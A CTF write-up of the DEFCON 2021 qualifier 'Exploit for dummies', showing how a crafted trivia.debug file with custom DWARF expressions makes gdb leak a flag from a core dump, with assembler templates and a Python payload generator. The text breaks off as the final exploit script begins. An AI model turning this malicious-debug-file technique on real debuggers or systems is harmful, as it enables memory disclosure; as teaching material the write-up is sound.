DEFCON quals 2021 - Exploit for dummies challenge writeup

Published on 2021-05-10

The DEFCON qualifiers took place around 10 days ago and I had a chance to take a look at the challenges. "Exploit for dummies" caught my eye, as I recognised myself in the term "dummy" and hoped I could solve this one.

The challenge was tagged "shellcoding" and, believe it or not, it ends up dealing with the DWARF debugging data format.

A trivia quiz

We are given an ELF binary named trivia which first reads ../../flag and stores it at a random location in memory thanks to a weird request to mmap. After that, it reads the questions.txt file to ask questions from various categories to the player.

When the player reaches a score of 5000, the program offers to save their name in a file on the filesystem. The filename is barely checked (only a few checks are done with access), so it is possible to trigger a segfault by asking it to overwrite a non-writable file, e.g. questions.txt. The name itself (which is stored in the file) is read with fgets, which reads at most 0x3ff bytes. This means we can write any file of at most 1023 bytes in the current directory, as long as it contains no \n character (which would stop fgets early).
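
This constraint is easy to check before sending anything. Here is a minimal sketch, assuming the buffer is 0x400 bytes long (so that fgets keeps at most 0x3ff of them) and that the payload ends with a single newline; the helper name is mine and does not come from the challenge:

```python
FGETS_BUFFER_SIZE = 0x400  # assumption: fgets keeps at most size - 1 = 0x3ff bytes


def fits_in_fgets(payload: bytes, size: int = FGETS_BUFFER_SIZE) -> bool:
    """Return True if a single fgets call would read `payload` in full."""
    if len(payload) > size - 1:
        return False  # fgets would truncate the data
    # A newline anywhere but in last position would stop fgets early.
    return b'\n' not in payload[:-1]


print(fits_in_fgets(b'A' * 1022 + b'\n'))
print(fits_in_fgets(b'AB\nCD\n'))
```

The first call is accepted, the second one is rejected because of the newline in the middle.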

When connecting to the remote target, we get the following:

$ nc exploit-for-dummies.challenges.ooo 5000
Ok, listen... here is the deal.
Now I am going to let you interact with a program.
You need to get the flag (that's the goal in a CTF, in case you did not notice that)
But I am here to help you. So, if you make the program crash and you give me the address of
the flag, I am going to get it out of the memory and print it for you.
Isn't it nice?

Ready? Here we go... just press ENTER and I'll spawn the service up for you.

starting...
cd ./tmp/dir_2663717
./trivia
--[ Score: 0 ]--

Secret Passwords for 200:
Super-secure launching code for Nuclear silos during the cold war.

We learn that the wrapper running remotely will handle a crash in the program and give us the memory content at a given address. So we have to gather all the questions, and answer them correctly. Here are the questions followed by their expected answer right below:

OOO is using a log-decay dynamic scoring formula in which the number of teams who solved a challenge is multiplied by which constant?
0.08
He once won a game of Connect Four in three moves, and inspired a Facebook master password
Chuck Norris
Which American group recorded a song named Ooo?
!!!
It was the first trivia question in the 2006 DEF CON quals. It all started like this: "Hack the ...."
planet
The famous president Skroob luggage combination
12345
What is the most common meaning of the OOO abbreviation according to wikipedia?
Out of Office
What was the first year in which OOO organized the defcon CTF?
2018
Level 1 questions make CISSPs turn red, Level 2 make SANS Fellows cry in frustration. We are talking of course of the CTF organized by...
ddtek
He described a penicillin shot in the ass as  "the worst thing that has ever happened to me". He is the one and only..
Kevin Mitnick
Default passwords for IBM 8225 systems
A52896nG93096a
It is 2008. It is the end of the cache as we know it. Or...
64K Should Be Good Enough For Anyone
When David Lightman hacked into the school system to change his grade in Biology 2, the school password was..
pencil
In this year, IDA Pro 5.0 introduced the first GUI.
2006
They took over the Defcon CTF organization in 2002, and defined the game as we all know and love today.
Ghetto Hackers
DNS guru, and the first person Dan called in 2008 to discuss its newly discovered DNS flaw.
Paul Vixie
What is the name of the legitbs 9-bit middle endian architecture?
Clemency
Its three-letter acronym is used by astronomers to indicate double neutron stars
Domain Name System
The name of the university from which he obtained his bachelor's degree.
Santa Clara University
Smashing the Stack for Fun and Profit. We all know it by heart, right? But do you remember its last sentence?
Use the source d00d
In 1992, the Zero Wing videogame shocked the world with the phrase:
All your base are belong to us
Super-secure launching code for Nuclear silos during the cold war.
00000000
In the defcon quals 2020, what was the highest ranked team that had three letters O in its name?
YOKARO-MON
Who (person) was the famous Defcon CTF organizer who said "The Scoring System determines the quality of the game"
Caezar
What was the first column in the first Jeopardy qualification board introduced by Kenshoto in 2006?
Binary L33tness
We are obviously talking about Dan ...
kaminsky

After writing a quick and dirty script to answer the questions, we eventually get asked which file to save to. We specify questions.txt and confirm that, after the crash, the wrapper launches a gdb session with gdb -c core trivia and executes x/s on the address we provide. We also learn that the address must start with 0x and be at most 16 characters long.

Okay, so what can we do now? After the command is executed, the wrapper exits and closes the remote connection, so there seems to be no way to dump multiple addresses. We know we can write a file to the filesystem before triggering the segfault by playing 2 games in a row. The flag is stored either in the program memory (which is dumped in core after the segmentation fault) or in the ../../flag file. So we first tried to write a file named core, to make gdb believe it was in another state and somehow read the flag file from the filesystem directly, but it seemed our file would get overwritten by the generated core file. We also tried to overwrite the binary itself so that gdb would load a custom ELF file, but overwriting it was not possible.

Running gdb on our binary under strace shows that it tries to load a file named trivia.debug from the current directory.

$ strace gdb trivia 2>&1 | grep $PWD
...
openat(AT_FDCWD, "/share/trivia", O_RDONLY) = 13
readlink("/share/", 0x7ffc1670f6b0, 1023) = -1 EINVAL (Invalid argum
faccessat2(AT_FDCWD, "/share/", F_OK, AT_EACCESS) = 0
openat(AT_FDCWD, "/share/trivia.debug", O_RDONLY|O_CLOEXEC) = 14)
...

As we can learn from gdb's documentation, .debug files are usually used to store extra debug symbols. The original binary stores the name of its debug file in a section named .gnu_debuglink. This section also contains a CRC32 checksum in order to verify that the file being loaded matches what the original binary expects to see.

If I had been more careful, I could have spotted it while checking the sections of the binary:

$ readelf -W -S trivia
...
  [28] .gnu_debuglink    PROGBITS        0000000000000000 00310c 000014 00      0   0  4
...
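
For reference, the layout of this section is simple: the NUL-terminated file name, padding up to a 4-byte boundary, then the CRC32 of the debug file. Below is a minimal sketch of a parser, assuming a little-endian target. The sample bytes are rebuilt by hand from the name trivia.debug and the CRC that the challenge binary expects (3d46c53b), they are not copied from the binary:

```python
import struct


def parse_debuglink(section: bytes):
    """Split a .gnu_debuglink section into (file name, CRC32)."""
    name_end = section.index(b'\x00')
    name = section[:name_end].decode()
    # The CRC starts at the next 4-byte boundary after the NUL terminator.
    crc_offset = (name_end + 1 + 3) & ~3
    (crc,) = struct.unpack_from('<I', section, crc_offset)
    return name, crc


# Hand-built sample section (illustrative, not dumped from trivia).
raw_name = b'trivia.debug\x00'
padding = b'\x00' * (-len(raw_name) % 4)
section = raw_name + padding + struct.pack('<I', 0x3d46c53b)

name, crc = parse_debuglink(section)
print(name, hex(crc), hex(len(section)))
```

The hand-built section is 0x14 bytes long, which is consistent with the size reported by readelf.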

Okay so that's great, it means we can write an ELF file of at most 1023 bytes named trivia.debug and this file will get loaded by gdb. Well, actually we also have to make sure the CRC matches the one that is hardcoded in the .gnu_debuglink section, but we'll think about that later.

Now my intuition was that I would have the possibility to write a debug symbol that would point directly to some place in memory and dump the flag like this. But well, the flag is allocated and stored at a random position in memory so it seemed not possible, especially since we can only trigger the call to gdb once.

However, this debug file thingy reminded me of a step in the SSTIC challenge 2019 that implemented a whole cryptographic algorithm using only DWARF debug information.

Creating custom DWARF information

Once I remembered this, I quickly spotted the function dwarf_expr_context::execute_stack_op in the gdb source code, which confirmed that there is indeed a whole virtual machine for DWARF, and I tried to find a way to reach it from the x/s command.

That was not easy and at some point I found the amazing DWARF v4 specification which says:

A DWARF procedure is represented by any kind of debugging information entry that has a DW_AT_location attribute.

So I was more confident there would be a way to actually execute code by calling x/s and I started playing around by crafting ELF files.

Crafting small ELF files

First things first, I wanted to make sure my files would fit in 1023 bytes as that would be our goal ultimately. And since I also wanted to manually craft the sections that would contain the DWARF information, I decided to make a linker script that would remove any unused section.

OUTPUT_FORMAT(elf64-x86-64)
SECTIONS
{
  .debug_info : {
    debug_info.o(.debug_info)
  }
  .debug_abbrev : {
    debug_abbrev.o(.debug_abbrev)
  }
  .debug_str : {
    debug_str.o(.debug_str)
  }
  /DISCARD/ : {
    *(.text)
    *(.bss)

    *(.debug_str)
    *(.debug_abbrev)
    *(.debug_info)

    *(.debug_line)
    *(.debug_aranges)
    *(.eh_frame)
    *(.note.gnu.property)
    *(.comment)
  }
}

I even removed the .text section as I didn't plan to execute any code. In the end only the .symtab, .strtab and .shstrtab sections remained. They couldn't be removed with the linker script, but that was not an issue as my file was already below 1023 bytes.

The .o files are assembled from simple .s files which contain either raw content with .incbin or raw data with .byte or .asciz.

.section .debug_info
.incbin "debug_info.raw"

.section .debug_str
.asciz "mysym"
.byte 0

Understanding DWARF

Thanks to the command objdump -g testfile, it was possible to see that the relevant DWARF information is loaded mainly from 3 different sections named .debug_info, .debug_abbrev and .debug_str.

$ objdump -g tiny.o

tiny.o:     file format elf64-x86-64

Contents of the .debug_info section (loaded from tiny.o):

  Compilation Unit @ offset 0x0:
   Length:        0x75 (32-bit)
   Version:       4
   Abbrev Offset: 0x0
   Pointer Size:  8
 <0><b>: Abbrev Number: 1 (DW_TAG_compile_unit)
    <c>   DW_AT_producer    : (indirect string, offset: 0x41): GNU C17 10.2.0 -mtune=generic -march=x86-64 -g -fno-pic -fno-stack-protector
    <10>   DW_AT_language    : 12	(ANSI C99)
    <11>   DW_AT_name        : (indirect string, offset: 0x3a): tiny.c
    <15>   DW_AT_comp_dir    : (indirect string, offset: 0x12): /share/
    <19>   DW_AT_low_pc      : 0x0
    <21>   DW_AT_high_pc     : 0xb
    <29>   DW_AT_stmt_list   : 0x0
 <1><2d>: Abbrev Number: 2 (DW_TAG_enumeration_type)
    <2e>   DW_AT_name        : (indirect string, offset: 0x0): chat
    <32>   DW_AT_encoding    : 7	(unsigned)
    <33>   DW_AT_byte_size   : 4
    <34>   DW_AT_type        : <0x4c>
    <38>   DW_AT_decl_file   : 1
    <39>   DW_AT_decl_line   : 1
    <3a>   DW_AT_decl_column : 6
    <3b>   DW_AT_sibling     : <0x4c>
 <2><3f>: Abbrev Number: 3 (DW_TAG_enumerator)
    <40>   DW_AT_name        : (indirect string, offset: 0x5): first
    <44>   DW_AT_const_value : 51
 <2><45>: Abbrev Number: 3 (DW_TAG_enumerator)
    <46>   DW_AT_name        : (indirect string, offset: 0xb): second
    <4a>   DW_AT_const_value : 52
 <2><4b>: Abbrev Number: 0
 <1><4c>: Abbrev Number: 4 (DW_TAG_base_type)
    <4d>   DW_AT_byte_size   : 4
    <4e>   DW_AT_encoding    : 7	(unsigned)
    <4f>   DW_AT_name        : (indirect string, offset: 0x2d): unsigned int

 [...] ; snip

Contents of the .debug_abbrev section (loaded from tiny.o):

  Number TAG (0x0)
   1      DW_TAG_compile_unit    [has children]
    DW_AT_producer     DW_FORM_strp
    DW_AT_language     DW_FORM_data1
    DW_AT_name         DW_FORM_strp
    DW_AT_comp_dir     DW_FORM_strp
    DW_AT_low_pc       DW_FORM_addr
    DW_AT_high_pc      DW_FORM_data8
    DW_AT_stmt_list    DW_FORM_sec_offset
    DW_AT value: 0     DW_FORM value: 0
   2      DW_TAG_enumeration_type    [has children]
    DW_AT_name         DW_FORM_strp
    DW_AT_encoding     DW_FORM_data1
    DW_AT_byte_size    DW_FORM_data1
    DW_AT_type         DW_FORM_ref4
    DW_AT_decl_file    DW_FORM_data1
    DW_AT_decl_line    DW_FORM_data1
    DW_AT_decl_column  DW_FORM_data1
    DW_AT_sibling      DW_FORM_ref4
    DW_AT value: 0     DW_FORM value: 0
   3      DW_TAG_enumerator    [no children]
    DW_AT_name         DW_FORM_strp
    DW_AT_const_value  DW_FORM_data1
    DW_AT value: 0     DW_FORM value: 0
   4      DW_TAG_base_type    [no children]
    DW_AT_byte_size    DW_FORM_data1
    DW_AT_encoding     DW_FORM_data1
    DW_AT_name         DW_FORM_strp
    DW_AT value: 0     DW_FORM value: 0

 [...] ; snip

Contents of the .debug_str section (loaded from tiny.o):

  0x00000000 63686174 00666972 73740073 65636f6e chat.first.secon
  0x00000010 64002f73 68617265 2f64756d 6d696573 d./share/dummies
  0x00000020 5f776f72 6b005f73 74617274 00756e73 _work._start.uns
  0x00000030 69676e65 6420696e 74007469 6e792e63 igned int.tiny.c
  0x00000040 00474e55 20433137 2031302e 322e3020 .GNU C17 10.2.0
  0x00000050 2d6d7475 6e653d67 656e6572 6963202d -mtune=generic -
  0x00000060 6d617263 683d7838 362d3634 202d6720 march=x86-64 -g
  0x00000070 2d666e6f 2d706963 202d666e 6f2d7374 -fno-pic -fno-st
  0x00000080 61636b2d 70726f74 6563746f 7200     ack-protector.

We understand that the .debug_abbrev section is used to describe some structures or abbreviations, and that .debug_info contains the actual debugging information, which refers to structures from the aforementioned section. The .debug_str section contains the debug strings such as variable names, file names, etc.

It means that we can declare any structure in .debug_abbrev with any possible content, and we can refer to the created structure in .debug_info in a way to say "hey there's a debug symbol available of the form that is described in the abbrev section and here is its content".
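
To make the encoding concrete, here is a minimal sketch of a .debug_abbrev parser. Each declaration is an abbreviation code, a tag and a "has children" byte, followed by (attribute, form) pairs and terminated by a 0, 0 pair; the numbers are ULEB128 encoded. The sample bytes declare a single hypothetical abbreviation (code 3, a DW_TAG_variable with a name and a constant value) and are only there for illustration:

```python
def read_uleb128(data, pos):
    """Decode an unsigned LEB128 integer; return (value, next position)."""
    result = shift = 0
    while True:
        byte = data[pos]
        pos += 1
        result |= (byte & 0x7f) << shift
        shift += 7
        if not byte & 0x80:
            return result, pos


def parse_abbrev(data):
    """Return {code: (tag, has_children, [(attribute, form), ...])}."""
    table, pos = {}, 0
    while pos < len(data):
        code, pos = read_uleb128(data, pos)
        if code == 0:  # a zero code terminates the table
            break
        tag, pos = read_uleb128(data, pos)
        has_children = bool(data[pos])
        pos += 1
        specs = []
        while True:
            attr, pos = read_uleb128(data, pos)
            form, pos = read_uleb128(data, pos)
            if attr == 0 and form == 0:  # end of this declaration
                break
            specs.append((attr, form))
        table[code] = (tag, has_children, specs)
    return table


# 0x34 = DW_TAG_variable, 0x03/0x0e = DW_AT_name/DW_FORM_strp,
# 0x1c/0x0b = DW_AT_const_value/DW_FORM_data1
raw = bytes([0x03, 0x34, 0x00, 0x03, 0x0e, 0x1c, 0x0b, 0x00, 0x00, 0x00])
table = parse_abbrev(raw)
print(table)
```

An entry in .debug_info then only has to start with the code 3, followed by a 4-byte string offset and a 1-byte constant.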

From there I needed to solve two things:

  1. Generate a symbol that upon printing would execute a DWARF bytecode
  2. Make sure that symbol is reachable from any context

For the first thing, as briefly mentioned before, creating a DW_TAG_variable with a DW_AT_name pointing to the name I want to give to my symbol and a DW_AT_location field makes it possible to execute DWARF bytecode. I can write any DW_OP_xxx opcode in my structure information, and during debugging it changes the value that x/s mysym prints, or even better, makes gdb complain that my opcode is invalid. But I only managed to make it work when creating a local variable and calling x/s from a context in which the variable was actually reachable.

For the second thing, I realised that a DW_TAG_enumerator with a DW_AT_const_value attribute can be printed from any context (whereas the variable is reachable only if the debugger is stopped in its scope). I couldn't find how to enlarge the scope of the variable, so I decided to go with the enumerator. However, it did not seem compatible with DW_AT_location: x/s mysym would just say that the symbol does not exist, exactly as with the DW_TAG_variable seen just before.

After a while I came up with the following trick: in .debug_info, first write a DW_TAG_variable entry named mysym that carries a DW_AT_location attribute, then a second DW_TAG_variable entry, also named mysym, that carries a DW_AT_const_value. My understanding is that thanks to the second entry, gdb is able to find the symbol when doing x/s mysym (probably thanks to the attribute DW_AT_const_value), but that it fetches the first occurrence of the symbol (the one with DW_AT_location) when actually getting the value.

It seems easy when written in a few sentences but it took me quite a while to figure this trick out. I'm pretty sure there are smarter ways to do it, but well, the challenge is named "exploit for dummies" after all, so I thought doing so would be completely appropriate.

In the end I came up with the following files:

.section .debug_abbrev
## Type 1
# Type ID
.byte 0x01
# Content
.byte 0x11, 0x01, 0x25, 0x0e, 0x13, 0x0b, 0x03, 0x0e, 0x1b, 0x0e, 0x11, 0x01, 0x12, 0x07, 0x10, 0x17
# End marker
.byte 0x00, 0x00

## Type 3
# Type ID
.byte 0x03
# Field 0 (DW_TAG_variable)
.byte 0x34, 0x00
# Field 1 (DW_AT_name, DW_FORM_strp) string pointer to symbol name
.byte 0x03, 0x0e
# Field 2 (DW_AT_const_value, DW_FORM_data1) constant on 1 byte
.byte 0x1c, 0x0b
# End marker
.byte 0x00, 0x00

## Type 4
# Type ID
.byte 0x04
# Field 0 (DW_TAG_variable)
.byte 0x34, 0x00
# Field 1 (DW_AT_name, DW_FORM_strp) string pointer to symbol name
.byte 0x03, 0x0e
# Field 2 (DW_AT_location, DW_FORM_exprloc) dwarf subprogram to compute location
.byte 0x02, 0x18
# End marker
.byte 0x00, 0x00

# End marker
.byte 0x00

.section .debug_info
# section length
.byte 0x37+SHELLCODE_SIZE, 0x00, 0x00, 0x00
# dwarf version
.byte 0x04, 0x00
# debug_abbrev offset
.byte 0x00, 0x00, 0x00, 0x00
# pointer size
.byte 0x08

### Entries
## Entry 1 (type 1)
# Tag (entry number in .debug_abbrev section)
.byte 0x01
# Data
.byte 0x2d, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00

## Entry 2 (type 4)
# Tag
.byte 0x04
# String pointer (offset 5 of .debug_str)
.byte 0x05, 0x00, 0x00, 0x00
# Shellcode size
.byte SHELLCODE_SIZE
# Shellcode data
.byte SHELLCODE

## Entry 3 (type 3)
# Tag
.byte 0x03
# String pointer (offset 5 of .debug_str)
.byte 0x05, 0x00, 0x00, 0x00
# Constant value
.byte 0x33

## End marker
.byte 0x00, 0x00

The first entry, used as a DW_TAG_compile_unit, does not seem useful, but gdb kept segfaulting when I did not provide it, so I preferred keeping it.

We will get to the shellcode part in the next section, but for now this provides the following debug information:

$ objdump -g trivia.debug

trivia.debug:     file format elf64-x86-64

Contents of the .debug_info section (loaded from trivia.debug):

  Compilation Unit @ offset 0x0:
   Length:        0x75 (32-bit)
   Version:       4
   Abbrev Offset: 0x0
   Pointer Size:  8
 <0><b>: Abbrev Number: 1 (DW_TAG_compile_unit)
    <c>   DW_AT_producer    : (indirect string, offset: 0x2d): GNU C17 10.2.0 -mtune=generic -march=x86-64 -g -fno-stack-protector
    <10>   DW_AT_language    : 12	(ANSI C99)
    <11>   DW_AT_name        : (indirect string, offset: 0x0): chat
    <15>   DW_AT_comp_dir    : (indirect string, offset: 0x12): /share/dummies_work
    <19>   DW_AT_low_pc      : 0x1000
    <21>   DW_AT_high_pc     : 0xb
    <29>   DW_AT_stmt_list   : 0x0
 <1><2d>: Abbrev Number: 4 (DW_TAG_variable)
    <2e>   DW_AT_name        : (indirect string, offset: 0x5): first
    <32>   DW_AT_location    : 2 byte block: 77	0 (DW_OP_breg7 (rsp): 0)
 <1><71>: Abbrev Number: 3 (DW_TAG_variable)
    <72>   DW_AT_name        : (indirect string, offset: 0x5): first
    <76>   DW_AT_const_value : 51
 <1><77>: Abbrev Number: 0

Contents of the .debug_abbrev section (loaded from trivia.debug):

  Number TAG (0x0)
   1      DW_TAG_compile_unit    [has children]
    DW_AT_producer     DW_FORM_strp
    DW_AT_language     DW_FORM_data1
    DW_AT_name         DW_FORM_strp
    DW_AT_comp_dir     DW_FORM_strp
    DW_AT_low_pc       DW_FORM_addr
    DW_AT_high_pc      DW_FORM_data8
    DW_AT_stmt_list    DW_FORM_sec_offset
    DW_AT value: 0     DW_FORM value: 0
   3      DW_TAG_variable    [no children]
    DW_AT_name         DW_FORM_strp
    DW_AT_const_value  DW_FORM_data1
    DW_AT value: 0     DW_FORM value: 0
   4      DW_TAG_variable    [no children]
    DW_AT_name         DW_FORM_strp
    DW_AT_location     DW_FORM_exprloc
    DW_AT value: 0     DW_FORM value: 0

Generating the DWARF shellcode

Now that we can execute DWARF bytecode, we have to figure out where the flag is stored in memory. The code can be summed up like this:

int main() {
  __int64 rand_stack2;          // rbx
  unsigned int v4;              // eax
  int i;                        // [rsp+18h] [rbp-58h]
  int fd;                       // [rsp+1Ch] [rbp-54h]
  char *rand_map;               // [rsp+20h] [rbp-50h]
  __int64 rand_stack;           // [rsp+28h] [rbp-48h] BYREF
  unsigned __int64 mmap_offset; // [rsp+30h] [rbp-40h] BYREF
  unsigned __int64 score;       // [rsp+38h] [rbp-38h]
  unsigned __int64 highscore;   // [rsp+40h] [rbp-30h]
  fdata *heapvar;               // [rsp+48h] [rbp-28h]
  FILE *stream;                 // [rsp+50h] [rbp-20h]
  unsigned __int64 canary;      // [rsp+58h] [rbp-18h]

  canary = __readfsqword(0x28u);
  heapvar = (fdata *)malloc(0x18uLL);
  rand_map = (char *)mmap_random(0x4C4B40uLL);
  score = 0LL;
  highscore = 5000LL;
  byte_4045FF = 0;

  fd = open("/dev/urandom", 0);
  read(fd, &rand_data, 8uLL);
  read(fd, &rand_stack, 8uLL);
  read(fd, &heapvar->rand_heap, 8uLL);
  read(fd, &mmap_offset, 3uLL);
  mmap_offset %= 0x4C4B1CuLL;

  stream = fopen("../../flag", "r");
  setvbuf(stream, 0LL, 2, 0LL);
  fgets(&rand_map[mmap_offset], 36, stream);
  rand_map[mmap_offset + 36] = 0;
  fclose(stream);

  rand_stack2 = heapvar->rand_heap ^ rand_stack ^ rand_data ^ (unsigned __int64)&rand_map[mmap_offset];
  mmap_offset = -1LL;

  // Start the quiz
  read_questions();
  rand_swap((__int64 *)questions, 25uLL);
  while (1) {
    // ... (snip)
  }

  return __readfsqword(0x28u) ^ canary;
}

We figure that the flag is stored at &rand_map[mmap_offset] which is a random location in the memory, but we are provided variables in different locations in the memory which once xored together could leak the flag position.

  rand_stack2 = heapvar->rand_heap ^ rand_stack ^ rand_data ^ &rand_map[mmap_offset]

Is equivalent to:

  &rand_map[mmap_offset] = heapvar->rand_heap ^ rand_stack ^ rand_data ^ rand_stack2
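
This works because xor is its own inverse: xoring the three random values a second time cancels them out. A quick sanity check with made-up numbers (the flag address below is arbitrary, and the variable names simply mirror the decompiled code):

```python
import secrets

flag_addr = 0x7f1234567000  # arbitrary address, for illustration only
rand_data, rand_stack, rand_heap = (secrets.randbits(64) for _ in range(3))

# What main() computes and leaves behind
rand_stack2 = rand_heap ^ rand_stack ^ rand_data ^ flag_addr

# What we compute from the values found in the core dump
recovered = rand_heap ^ rand_stack ^ rand_data ^ rand_stack2
print(hex(recovered))
```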

Thanks to gdb we can spot their exact location in memory at the moment of the crash, and write a small shellcode to retrieve it:

#!/usr/bin/env python3
import struct


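def gen_file(sc):
  # Fill the SHELLCODE_SIZE and SHELLCODE placeholders of the debug_info.s template
  with open('debug_info.s', 'r') as f:
    data = f.read()
  # SHELLCODE_SIZE must be replaced first, as SHELLCODE is a prefix of it
  data = data.replace('SHELLCODE_SIZE', str(len(sc)))
  data = data.replace('SHELLCODE', ', '.join(map(hex, sc)))
  with open('debug_info.gen.s', 'w') as f:
    f.write(data)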


DW_OP_const1u     = 0x08
DW_OP_const2u     = 0x0a
DW_OP_const4u     = 0x0c
DW_OP_const8u     = 0x0e

DW_OP_dup         = 0x12

DW_OP_or          = 0x21
DW_OP_plus        = 0x22
DW_OP_shl         = 0x24
DW_OP_shr         = 0x25
DW_OP_xor         = 0x27

DW_OP_deref       = 0x06
DW_OP_reg7        = 0x57 # rsp
DW_OP_breg7       = 0x77 # rsp
DW_OP_piece       = 0x93
DW_OP_stack_value = 0x9f
DW_OP_push_object_address = 0x97

# Shellcode starts here
sc = []

# Get the 3rd random value in the heap at [[rsp + 8*23] + 0x10]
sc += [DW_OP_breg7, 0x00]
sc += [DW_OP_const1u, 8 * 23]
sc += [DW_OP_plus]
sc += [DW_OP_deref]
sc += [DW_OP_const1u, 8 * 2]
sc += [DW_OP_plus]
sc += [DW_OP_deref]

# Get the 2nd random value at [rsp + 8*19]
sc += [DW_OP_breg7, 0x00]
sc += [DW_OP_const1u, 8 * 19]
sc += [DW_OP_plus]
sc += [DW_OP_deref]

# xor them
sc += [DW_OP_xor]

# Get the 1st random value at offset 0x404100 in .data
sc += [DW_OP_const8u, 0x00, 0x41, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00]
sc += [DW_OP_deref]

# xor them
sc += [DW_OP_xor]

# Get the last value at [rsp]
sc += [DW_OP_breg7, 0x00]
sc += [DW_OP_const1u, 0]
sc += [DW_OP_plus]
sc += [DW_OP_deref]

# xor them
sc += [DW_OP_xor]

# get the address
sc += [DW_OP_stack_value]

gen_file(sc)
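
Before involving gdb, such a byte list can be sanity checked with a toy interpreter. The following is only a minimal sketch that supports the handful of opcodes used above; it is not how gdb evaluates expressions, and every address and value in the fake memory image is invented for the demo:

```python
import struct

# Opcode values from the DWARF v4 specification
DW_OP_deref, DW_OP_const1u, DW_OP_const8u = 0x06, 0x08, 0x0e
DW_OP_plus, DW_OP_xor, DW_OP_breg7 = 0x22, 0x27, 0x77

MASK = (1 << 64) - 1


def read_sleb128(code, pc):
    """Decode a signed LEB128 integer; return (value, next position)."""
    result = shift = 0
    while True:
        byte = code[pc]
        pc += 1
        result |= (byte & 0x7f) << shift
        shift += 7
        if not byte & 0x80:
            if byte & 0x40:  # sign bit of the last byte
                result -= 1 << shift
            return result, pc


def evaluate(code, rsp, read_u64):
    """Run a DWARF expression and return the value left on top of the stack."""
    stack, pc = [], 0
    while pc < len(code):
        op = code[pc]
        pc += 1
        if op == DW_OP_const1u:
            stack.append(code[pc])
            pc += 1
        elif op == DW_OP_const8u:
            stack.append(struct.unpack('<Q', bytes(code[pc:pc + 8]))[0])
            pc += 8
        elif op == DW_OP_breg7:  # push rsp + signed offset
            offset, pc = read_sleb128(code, pc)
            stack.append((rsp + offset) & MASK)
        elif op == DW_OP_plus:
            b, a = stack.pop(), stack.pop()
            stack.append((a + b) & MASK)
        elif op == DW_OP_xor:
            b, a = stack.pop(), stack.pop()
            stack.append(a ^ b)
        elif op == DW_OP_deref:  # replace an address by the 8 bytes stored there
            stack.append(read_u64(stack.pop()))
        else:
            raise ValueError(f'unsupported opcode {op:#x}')
    return stack[-1]


# Fake memory image laid out like the description above (all values made up)
rsp, heap, flag_addr = 0x7ffc00000000, 0x1234000, 0x7f0012345678
rand_heap, rand_stack, rand_data = 0x1111, 0x2222, 0x4444
memory = {
    rsp + 8 * 23: heap,
    heap + 0x10: rand_heap,
    rsp + 8 * 19: rand_stack,
    0x404100: rand_data,
    rsp: rand_heap ^ rand_stack ^ rand_data ^ flag_addr,
}

sc = [DW_OP_breg7, 0, DW_OP_const1u, 8 * 23, DW_OP_plus, DW_OP_deref,
      DW_OP_const1u, 8 * 2, DW_OP_plus, DW_OP_deref,
      DW_OP_breg7, 0, DW_OP_const1u, 8 * 19, DW_OP_plus, DW_OP_deref,
      DW_OP_xor,
      DW_OP_const8u, 0x00, 0x41, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
      DW_OP_deref, DW_OP_xor,
      DW_OP_breg7, 0, DW_OP_const1u, 0, DW_OP_plus, DW_OP_deref,
      DW_OP_xor]

recovered = evaluate(sc, rsp, memory.__getitem__)
print(hex(recovered))
```

With this fake image, the expression evaluates back to the address chosen for the flag.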

This looks great, but while trying locally I stumbled on an issue with DW_OP_stack_value, which turns the value on top of the stack into the value of the symbol (and thus into the address that x/s examines): gdb would sign extend it and end up with something like 0xffffffff41424344 for the flag address. I couldn't get rid of this and thus did not manage to get x/s to print the entire flag as a string.

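However, if we remove DW_OP_stack_value from our shellcode, the computed value is treated as the location of the symbol instead. As far as I understand, gdb then reads the value of the symbol from that location, i.e. the first bytes of the flag, and x/s tries to use them as an address. The resulting error message leaks the first 4 bytes of the flag, and thus we can simply repeat the operation while advancing the pointer 4 bytes at a time (and I'm happy there are only 36 bytes to leak):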

sc += [DW_OP_const1u, 4]
sc += [DW_OP_plus]
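
Since every run leaks a single 4-byte chunk, one variant of the shellcode is needed per offset. A minimal sketch of how the variants can be generated; the helper name is mine, and the two-byte base stands in for the real address computation:

```python
DW_OP_const1u = 0x08
DW_OP_plus = 0x22

FLAG_SIZE = 36   # size passed to fgets in main()
CHUNK_SIZE = 4   # bytes leaked per gdb invocation


def with_offset(sc, offset):
    """Return a copy of the shellcode that adds `offset` to the computed address."""
    if offset == 0:
        return list(sc)
    return list(sc) + [DW_OP_const1u, offset, DW_OP_plus]


base = [0x77, 0x00]  # placeholder for the real computation (DW_OP_breg7 0)
variants = [with_offset(base, off) for off in range(0, FLAG_SIZE, CHUNK_SIZE)]
print(len(variants))
```

That makes 9 connections to the remote service in total, one per chunk.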

Executing remotely

Now we're ready: we make sure our file does not contain any \n character and send it to the remote service. We quickly realise that the CRC does not match. Of course, we have to patch the CRC to the one that is hardcoded in the trivia binary, i.e. 3d46c53b. For that I used this script, which allows me to force a CRC32 on my input file (kudos to burrito, it is indeed faster than bruteforcing like a dummy).

Tried it again, and whoops, it still didn't work. And for good reason: after fgets is called, the character \n is added to the content of our file, followed by the player's score divided by 0x64! So I had to append my current score to the file first, force its CRC to the one we wanted, then remove the score again so that the CRC matches once the remote binary appends our score to the file.
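
The check can be reproduced offline with zlib.crc32, the same CRC32 that binascii.crc32 computes. This is a minimal sketch, assuming the file on disk ends up being exactly the bytes we send (final \n included) followed by a single byte holding score // 0x64; the helper names and the demo payload are made up:

```python
import zlib

TARGET_CRC = 0x3d46c53b  # value hardcoded in the trivia binary


def file_as_written(sent: bytes, score: int) -> bytes:
    """Content of the remote file: what we sent, then the score byte (assumed layout)."""
    return sent + bytes([score // 0x64])


def crc_matches(sent: bytes, score: int, target: int = TARGET_CRC) -> bool:
    """Tell whether gdb's CRC check would pass for this payload and score."""
    return zlib.crc32(file_as_written(sent, score)) == target


# Demo with a dummy payload: its "target" is computed for a score of 5000,
# so the check passes for that score and fails for any other one.
payload = b'not a real debug file\n'
demo_target = zlib.crc32(file_as_written(payload, 5000))
print(crc_matches(payload, 5000, demo_target), crc_matches(payload, 5200, demo_target))
```

The score at the time of saving therefore has to be known before the CRC is forced.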

Here's my not-so-pretty but working script:

#!/usr/bin/env python3

from pwn import *
import struct
import binascii
import forcecrc32

answers = {}
